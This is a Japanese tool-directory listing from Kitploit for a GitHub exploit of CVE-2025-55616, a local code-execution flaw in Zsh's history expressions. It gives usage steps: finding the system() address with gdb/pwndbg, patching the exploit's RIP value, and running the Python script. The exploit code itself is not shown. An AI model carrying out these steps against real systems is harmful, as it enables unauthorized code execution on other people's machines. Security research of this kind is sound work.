Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-55616 — CVE-2025-55616 のエクスプロイト。Zsh の履歴式を介したローカル RCE であり、ユーザー権限で任意のコード実行を実現します。 | Kitploit
ツール/GitHubGitHub/livepwn/cve-2025-55616
脆弱性分析エクスプロイトペネトレーションテストレッドチーミングバイナリエクスプロイト
GitHublivepwn/cve-2025-55616

CVE-2025-55616

CVE-2025-55616 のエクスプロイト。Zsh の履歴式を介したローカル RCE であり、ユーザー権限で任意のコード実行を実現します。

リポジトリを見る
210ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-55616

作成者: Rana M.Sinan Adil

  • Zsh のヒストリ式を通じて RCE につながる脆弱性

重要ポイント

このエクスプロイトを実行するには: エクスプロイト内の IP アドレスと「p system」だけを変更してください。私も自分の2台目のラップトップで試しましたが、変更するには gdb(特に pwndbg)で次のコマンドを実行してください:

root@kitploit:~
$ gdb zsh -f (ターミナルで)

pwndbg> run -f

username% ! (username はあなたのものになります。! とだけ入力してください)

username% !!11111111111 (ここも同じで !!11111111111 とだけ入力してください)

pwndbg> p system

「p system」のアドレスを取得したら、エクスプロイト内の

次の行でそれを変更してください:

root@kitploit:~
b'set $rip =  0x7ffff7cc9110', (0x7ffff7cc9110 の代わりにあなたの p system アドレスを使用してください)

説明

この脆弱性により、ローカルの攻撃者は Zsh プロセスを実行しているユーザーの権限で任意コード実行(RCE)を達成できます。

使用方法

root@kitploit:~
python3 CVE-2025-55616.py
ツールをダウンロード